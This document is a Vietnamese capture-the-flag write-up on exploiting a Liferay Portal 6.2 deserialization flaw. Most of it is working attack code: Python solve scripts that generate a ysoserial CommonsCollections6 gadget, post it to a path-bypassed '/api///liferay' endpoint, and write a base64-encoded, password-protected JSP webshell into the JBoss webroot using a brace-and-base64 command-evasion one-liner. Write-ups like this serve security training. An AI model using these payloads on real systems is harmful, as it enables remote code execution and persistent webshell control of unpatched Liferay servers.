- Challenge sử dụng Liferay Portal version 6.2 và jboss-7.1.1, đây là phiên bản Liferay có khá nhiều CVE có thể khai thác được.
- Vì challenge là internal network nên loại trừ các CVE Deserialize sử dụng gadget chain RMI hoặc tương tự.
```yaml=
networks:
- internal_network
networks:
internal_network:
driver: bridge
```
- Liferay TunnelServlet Deserialization Remote Code Execution (LPE-15538) là lỗ hổng có thể sử dụng để khai thác. `/api/liferay`, `/api/spring` deserialize object từ post request body tuy nhiên các servlet này chỉ có thể truy cập từ localhost.
- Nếu server cấu hình sai, ví dụ có reverse proxy đứng phía trước web server, khi forward request đến liferay, request được coi như gọi từ localhost ==> endpoint accessable ==> exploitable:
- Bypass restrict configuration:
- Sử dụng [ysoserial](https://github.com/frohoff/ysoserial.git) để gen gadget chain với CommonsCollections6, sau đó POST request data đến API `/api///liferay`, solve script:
```python
import requests
import os
URL = "http://localhost:8080"
os.system('"D:/[path]/ysoserial-all.jar CommonsCollections6 "touch /tmp/test" > a.bin')
r = requests.post(URL + "/api///liferay", data = open("a.bin", "rb"))
print(r.text)
```
- Vì không có outbound nên ta có thể tạo webshell ở webroot
`/opt/liferay-portal-6.2-ce-ga3/jboss-7.1.1/standalone/deployments/ROOT.war`
- Payload command tạo webshell:
```!
echo PCVAIHBhZ2UgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiICU+CjwlCiU+CjxIVE1MPgogICAgPEJPRFk+CiAgICAgICAgPEgzPkpTUCBTSEVMTDwvSDM+CiAgICAgICAgPEZPUk0gTUVUSE9EPSJQT1NUIiBOQU1FPSJteWZvcm0iIEFDVElPTj0iIj4KICAgICAgICAgICAgPElOUFVUIFRZUEU9InBhc3N3b3JkIiBOQU1FPSJwYXNzd29yZCI+CiAgICAgICAgICAgIDxJTlBVVCBUWVBFPSJ0ZXh0IiBOQU1FPSJjbWQiPgogICAgICAgICAgICA8SU5QVVQgVFlQRT0ic3VibWl0IiBWQUxVRT0iRXhlY3V0ZSI+CiAgICAgICAgPC9GT1JNPgogICAgICAgIDxQUkU+CiAgICAgICAgPCUKICAgICAgICBpZiAoInp6enp6eiIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwYXNzd29yZCIpKSkgewogICAgICAgICAgICBpZiAocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpICE9IG51bGwpIHsKICAgICAgICAgICAgICAgIG91dC5wcmludGxuKCJDb21tYW5kOiAiICsgcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpICsgIjxCUj4iKTsKICAgICAgICAgICAgICAgIFByb2Nlc3MgcCA9IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKICAgICAgICAgICAgICAgIE91dHB1dFN0cmVhbSBvcyA9IHAuZ2V0T3V0cHV0U3RyZWFtKCk7CiAgICAgICAgICAgICAgICBJbnB1dFN0cmVhbSBpbiA9IHAuZ2V0SW5wdXRTdHJlYW0oKTsKICAgICAgICAgICAgICAgIERhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKICAgICAgICAgICAgICAgIFN0cmluZyBkaXNyID0gZGlzLnJlYWRMaW5lKCk7CiAgICAgICAgICAgICAgICB3aGlsZSAoIGRpc3IgIT0gbnVsbCApIHsKICAgICAgICAgICAgICAgICAgICBvdXQucHJpbnRsbihkaXNyKTsKICAgICAgICAgICAgICAgICAgICBkaXNyID0gZGlzLnJlYWRMaW5lKCk7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgIH0KICAgICAgICB9IGVsc2UgewogICAgICAgICAgICBvdXQucHJpbnRsbigiSW5jb3JyZWN0IHBhc3N3b3JkIik7CiAgICAgICAgfQogICAgICAgICU+CiAgICAgICAgPC9QUkU+CiAgICA8L0JPRFk+CjwvSFRNTD4K | base64 -d > /opt/liferay-portal-6.2-ce-ga3/jboss-7.1.1/standalone/deployments/ROOT.war/nammh.jsp
```
- Sử dụng `bash -c {echo,b64}|{base64,-d}|{bash,-i}` để bypass command in Java, solve script tạo webshell:
```python!
import requests
import os
URL = "http://localhost:8080"
os.system('"D:/[path]/ysoserial-all.jar CommonsCollections6 "bash -c {echo,ZWNobyBQQ1ZBSUhCaFoyVWdhVzF3YjNKMFBTSnFZWFpoTG5WMGFXd3VLaXhxWVhaaExtbHZMaW9pSUNVK0Nqd2xDaVUrQ2p4SVZFMU1QZ29nSUNBZ1BFSlBSRmsrQ2lBZ0lDQWdJQ0FnUEVnelBrcFRVQ0JUU0VWTVREd3ZTRE0rQ2lBZ0lDQWdJQ0FnUEVaUFVrMGdUVVZVU0U5RVBTSlFUMU5VSWlCT1FVMUZQU0p0ZVdadmNtMGlJRUZEVkVsUFRqMGlJajRLSUNBZ0lDQWdJQ0FnSUNBZ1BFbE9VRlZVSUZSWlVFVTlJbkJoYzNOM2IzSmtJaUJPUVUxRlBTSndZWE56ZDI5eVpDSStDaUFnSUNBZ0lDQWdJQ0FnSUR4SlRsQlZWQ0JVV1ZCRlBTSjBaWGgwSWlCT1FVMUZQU0pqYldRaVBnb2dJQ0FnSUNBZ0lDQWdJQ0E4U1U1UVZWUWdWRmxRUlQwaWMzVmliV2wwSWlCV1FVeFZSVDBpUlhobFkzVjBaU0krQ2lBZ0lDQWdJQ0FnUEM5R1QxSk5QZ29nSUNBZ0lDQWdJRHhRVWtVK0NpQWdJQ0FnSUNBZ1BDVUtJQ0FnSUNBZ0lDQnBaaUFvSW5wNmVucDZlaUl1WlhGMVlXeHpLSEpsY1hWbGMzUXVaMlYwVUdGeVlXMWxkR1Z5S0NKd1lYTnpkMjl5WkNJcEtTa2dld29nSUNBZ0lDQWdJQ0FnSUNCcFppQW9jbVZ4ZFdWemRDNW5aWFJRWVhKaGJXVjBaWElvSW1OdFpDSXBJQ0U5SUc1MWJHd3BJSHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRzkxZEM1d2NtbHVkR3h1S0NKRGIyMXRZVzVrT2lBaUlDc2djbVZ4ZFdWemRDNW5aWFJRWVhKaGJXVjBaWElvSW1OdFpDSXBJQ3NnSWp4Q1VqNGlLVHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJRkJ5YjJObGMzTWdjQ0E5SUZKMWJuUnBiV1V1WjJWMFVuVnVkR2x0WlNncExtVjRaV01vY21WeGRXVnpkQzVuWlhSUVlYSmhiV1YwWlhJb0ltTnRaQ0lwS1RzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUU5MWRIQjFkRk4wY21WaGJTQnZjeUE5SUhBdVoyVjBUM1YwY0hWMFUzUnlaV0Z0S0NrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCSmJuQjFkRk4wY21WaGJTQnBiaUE5SUhBdVoyVjBTVzV3ZFhSVGRISmxZVzBvS1RzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUVSaGRHRkpibkIxZEZOMGNtVmhiU0JrYVhNZ1BTQnVaWGNnUkdGMFlVbHVjSFYwVTNSeVpXRnRLR2x1S1RzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUZOMGNtbHVaeUJrYVhOeUlEMGdaR2x6TG5KbFlXUk1hVzVsS0NrN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCM2FHbHNaU0FvSUdScGMzSWdJVDBnYm5Wc2JDQXBJSHNLSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNCdmRYUXVjSEpwYm5Sc2JpaGthWE55S1RzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQmthWE55SUQwZ1pHbHpMbkpsWVdSTWFXNWxLQ2s3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0I5Q2lBZ0lDQWdJQ0FnSUNBZ0lIMEtJQ0FnSUNBZ0lDQjlJR1ZzYzJVZ2V3b2dJQ0FnSUNBZ0lDQWdJQ0J2ZFhRdWNISnBiblJzYmlnaVNXNWpiM0p5WldOMElIQmhjM04zYjNKa0lpazdDaUFnSUNBZ0lDQWdmUW9nSUNBZ0lDQWdJQ1UrQ2lBZ0lDQWdJQ0FnUEM5UVVrVStDaUFnSUNBOEwwSlBSRmsrQ2p3dlNGUk5URDRLIHwgYmFzZTY0IC1kID4gL29wdC9saWZlcmF5LXBvcnRhbC02LjItY2UtZ2EzL2pib3NzLTcuMS4xL3N0YW5kYWxvbmUvZGVwbG95bWVudHMvUk9PVC53YXIvbmFtbWguanNw}|{base64,-d}|{bash,-i}" > a.bin')
r = requests.post(URL + "/api///liferay", data = open("a.bin", "rb"))
print(r.text)
```
- Tạo webshell thành công:
- Get flag:
Sign in with Wallet
Connect another wallet